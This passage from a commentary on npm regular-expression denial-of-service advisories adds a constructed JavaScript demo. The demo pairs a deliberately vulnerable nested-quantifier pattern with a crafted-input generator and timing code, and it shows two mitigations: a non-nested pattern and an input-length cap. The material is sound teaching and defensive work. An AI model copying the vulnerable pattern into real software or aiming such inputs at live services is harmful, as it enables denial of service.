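Seventeen entries in this list, from braces at the top to marked at the bottom, are regular expression denial of service, and the advisories keep quoting the same figures: tens of thousands of characters of crafted input, seconds of blocked event loop, growing exponentially or quadratically with length. The following is an added example, not code from any package on the list. It shows the shape of the problem on a constructed pattern, how to measure it, and the two controls the recommendations amount to: a pattern without nested quantifiers, and an input-length cap applied before any regex runs (the timespan entry suggests 150 characters as a workable bound).

```javascript
// Added example, not code from any advisory above. Pattern and inputs are
// constructed for illustration.

// Nested quantifier: for "aaa...a!" the engine tries about 2^n ways to split
// the a's between the inner and outer group before failing.
const VULNERABLE = /^(a+)+$/;
// Same language, no nesting: one pass, linear in the input length.
const SAFE = /^a+$/;

function evilInput(n) {
  return 'a'.repeat(n) + '!';
}

// Wall-clock milliseconds for one test of `re` against `input`.
function timeMatch(re, input) {
  const start = process.hrtime.bigint();
  const matched = re.test(input);
  const ms = Number(process.hrtime.bigint() - start) / 1e6;
  return { matched, ms };
}

// Growth table: each extra character roughly doubles the vulnerable time
// while the safe pattern stays flat.
function growthTable(sizes) {
  return sizes.map((n) => ({
    n,
    vulnerableMs: timeMatch(VULNERABLE, evilInput(n)).ms,
    safeMs: timeMatch(SAFE, evilInput(n)).ms,
  }));
}

// Control that does not depend on getting the regex right: bound the input
// before it reaches any matcher. The advisories quote ~50,000 characters
// for seconds of blocking; a header, version string or date never needs
// anywhere near 150.
const MAX_INPUT = 150;

function matchBounded(re, input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  if (input.length > MAX_INPUT) return { ok: false, reason: 'input too long' };
  return { ok: true, matched: re.test(input) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(growthTable([12, 16, 20, 22]));
  console.log(matchBounded(VULNERABLE, evilInput(10000)));
}
```

Run stand-alone, the table makes the exponential growth visible within a few hundred milliseconds at n=22; pushing n past the high twenties blocks the process for seconds, which is the denial of service. The length cap is the control to apply first because it protects every regex behind it, including the ones in dependencies you have not audited; replacing nested quantifiers is the fix for the patterns you own.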